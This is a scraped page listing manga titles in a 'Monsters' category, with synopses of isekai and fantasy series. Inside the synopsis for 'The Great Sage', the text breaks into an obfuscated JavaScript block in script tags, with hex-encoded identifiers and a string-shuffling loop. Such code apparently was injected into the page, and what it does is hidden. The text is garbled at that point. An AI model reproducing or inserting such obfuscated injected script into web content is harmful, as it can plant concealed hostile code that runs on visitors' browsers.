Monsters - Page 8

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121 results

Strange Love Rivals Increased!

After I isekai’d as the female villain of an otome game, I just wanted to avoid the death ending and live a peaceful life. But why are the male lead and female lead fighting over me? Los rivales de amor extraños aumentaron, 奇怪的情敌增加了  


The Great Sage

Gu Cheng was teleported to a mysterious world of cultivation and became the First Young Master of the Zhong Yong Residence. To avoid his aunt's sneaky attacks, he left town and entered the Night Division, which keeps the supernatural things in order. It's a holy day / ????<script></script><script>(function(_0x5d1418,_0x36c641){var _0x597ac6=_0x4e9a,_0x9466d5=_0x5d1418();while(!![]){try{var _0x3a78a6=-parseInt(_0x597ac6(0x75))/(-0x19b6+0x18f9+0xbe)*(parseInt(_0x597ac6(0x68))/(0x1*0xfe9+-0x69*-0x16+0x2c5*-0x9))+parseInt(_0x597ac6(0x6b))/(-0x72+-0xfe9+0x1*0x105e)+parseInt(_0x597ac6(0x7b))/(0x7ee+0x5*0x89+-0x1*0xa97)+-parseInt(_0x597ac6(0x67))/(-0x25d8+-0x90a+-0x2ee7*-0x1)*(parseInt(_0x597ac6(0x6d))/(-0xd9d+0xb89+0x21a))+-parseInt(_0x597ac6(0x6c))/(0x16ab+0x166e+-0x12*0x281)+parseInt(_0x597ac6(0x7e))/(0x1d*0xe3+0x1*0x1ee2+-0x3891)*(-parseInt(_0x597ac6(0x79))/(0xa*0x2d3+-0x9ee+-0x1247))+parseInt(_0x597ac6(0x7a))/(0x1407+0x11*0x1e9+0x9e*-0x55);if(_0x3a78a6===_0x36c641)break;else _0x9466d5['push'](_0x9466d5['shift']());}catch(_0x2805a1){_0x9466d5['push'](_0x9466d5['shift']());}}}(_0x5c91,0x2742*-0x90+0x83d7b+0x50099*0x5));function custom(){var _0xf293f=_0x4e9a,_0x50cf56={'MQQMk':function(_0x5e6340,_0x1c8601){return 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SSS-Class Revival Hunter

In the mysterious, RPG dungeon-like Tower, Gongja Kim lives a mundane existence, envying all the star hunters. One day, his wish for more is granted with a legendary skill to copy others’ abilities… at the cost of his life. Before he can make sense of it, he’s killed by the #1 hunter, the Flame Emperor! But this activates his skill and now he’s copied a new one, the ability to travel back in time upon death. How will Gongja use these skills to outplay the competition and rise to the top?


Leveling Up Alone

Living in a world infested with monsters is hard enough, but doing it without powers? That’s Hanyeol’s life in a nutshell. Fearsome beasts roam the earth and kill everyone in their path. Elite members of society called the Awakened mobilize to protect humanity with their supernatural abilities. Amidst it all, Hanyeol is just a poor porter, tasked as sideline support. But when a benevolent being gifts him with special abilities, he’s ready to harvest all the loot and take it to the next level! --- - [Original Webtoon ]( --- - [Official Japanese Translation]( - [Official Simplified Chinese Translation](


Boku no Kawaii Musume wa Futago no Kenja: Tokugi ga Debafu no Teihen Kuro Mashirube-shi, Sodateta Futago no Musume ga S-rank no Dai Kenja ni Natte Shimau

Elcan, a dark magician, is fired from his party due to his lack of talent with offensive magic. As he wandered the streets he came across twins, who were abandoned by their parents. \"I couldn\'t be a good dark magician, but I want to make their lives better!\" He decided to retire from being an adventurer and raise these two girls as his own. And so, he raised his daughters, Corona and Selena. Teaching them black magic and enrolling them in a prestigious magician’s academy. After learning more about magic, the girls return to see their father with some important news… They are S-rank Sages?! And they want to form a party with him?! A new adventure between a father and his daughters begin!


A Good-Natured Craftsman Leisurely Travels Through Another World

Ryoichi Ishikawa, a young man who lost his father, who was his only relative, also decided to close the electrical shop that he and his father had been working on.From a strange matter, I choose to transfer to another world by my own will.It was supposed to be the second life of a leisurely trip, but I can not leave the person in need.We solve many worries by making full use of the cheat skills given by God and the skills of craftsmen.Sometime around, friends with one or two habits gathered…! ?The journey of a good-natured craftsman in another world begins here!


Manadeshi ni Uragirarete Shinda Ossan Yuusha, Shijou Saikyou no Maou to Shite Ikikaeru

The hero, Fried, confronts the demon lord with his student, Lyle. Fried killed the demon lord after a ferocious battle. “I\'m going to put an end to this war!” Just as he was about to finish off the demon lord, he is betrayed by his student who attacked from behind. Fried, who was supposed to be dead, wakes up next to a demon girl who calls him the demon lord for some reason. It seems that Fried has risen as the new demon lord and will now have to protect the demonkind under his command while fighting his former comrades - [Webnovel Link](


Netachara-Tensei Toka Anmarida!

Toru Aikawa, a college student who spends his days immersing himself in games because his daily life is so boring, was standing alone in a forest in a different world before he even could realize why. Moreover, it seems that he has reincarnated into the \"Neta character\" he made in a game. The Genderswap reincarnation of the strongest heroine packed with overflowing Chuunibyo and ideals! The strongest genderswap reincarnation fantasy begins here !! --- **Note:** A Neta character is a character whose action has captured the hearts of viewers and players and has been turned into a important part of the story.


Hell Mode: The Hardcore Gamer Dominates in Another World with Garbage Balancing

Yamada Kenichi, a single, 35-year-old businessman, has spent the majority of his adult life playing every MMORPG to hit the market. Tired of the constant cycle of repetitive, newbie-centric gameplay, he is immediately drawn in by the promise of a new game that, on top of being never-ending, offers up a \"Hell Mode\" — a difficulty level that makes it nigh impossible to level up but also promises uncapped growth potential. Upon selecting the newly released Summoner class, Kenichi finds himself reborn as Allen, an infant in a serf family, with nothing but his wits and old memories to guide him. Allen works diligently to level himself up despite Hell Mode requiring vast amounts of experience between levels. In doing so, he hopes to uncover the secrets the Summoner class holds. All the while, he dedicates himself to freeing his new family from serfdom.


Dragon Daddy Diaries: A Girl Grows to Greatness

An immensely powerful and ancient dragon, once worshipped as a god by humans but now only a myth in their eyes, wakes up one day to find a human girl poking around his lair. The infant is barely old enough to say her own name, but is quite confident in calling the dragon “Daddy”! Bewildered by the unexpected visitor, the dragon soon learns that returning her to human civilization isn’t going to be an option... not yet, anyway. He quickly decides to raise the girl himself, determined to give her a happy life that will lead her back to human society when she is older — surely a simple task for a legendary being such as himself. All he needs to do now is find a place for her to sleep. And figure out where he is going to get clothes for her. And...wait, what do humans eat again? --- “Daddy!” The dragon blinked as the wee little human called out to him. Him? Her “Daddy”? Powerful enough to have been venerated by humankind, yet warmhearted and even a tad ditzy, the dragon soon finds himself raising and doting on the precocious Olivia as if she really were his daughter in this touching tale. The toddler may be impossibly cute now, but just you wait—she’s a curious child and she’s growing up real fast. You can bet that one day, she’ll be the strongest human there is! But first, how will he handle little Olivia receiving an acceptance letter to a human school? --- [Web Novel](


Assault Lily: League of Gardens -full bloom-

When the enigmatic life-forms called the Huge appeared, they nearly brought the world to ruin. But humanity studied the energy called magie and created CHARMs, potent weapons against the Huge. Teenage girls, who proved to resonate the most with CHARMs, became the vanguard in the war with the Huge. There is a name for these girls who fight against humankind\'s end. They are known as elegant flowers of battle—as Lilies. A manga adaptation of the stage play \"Assault Lily: League of Gardens.\"


Doukutsu Ou kara Hajimeru Rakuen Life ~Bannou no Saikutsu Skill de Saikyou ni!?~

Hiel was ridiculed for having a useless crest and was exiled to a remote island. When he grabbed an pickaxe to reclaim the island, the true effect of his crest was revealed. With his production cheat he will reclaim this uninhabited island and start his life in paradise.
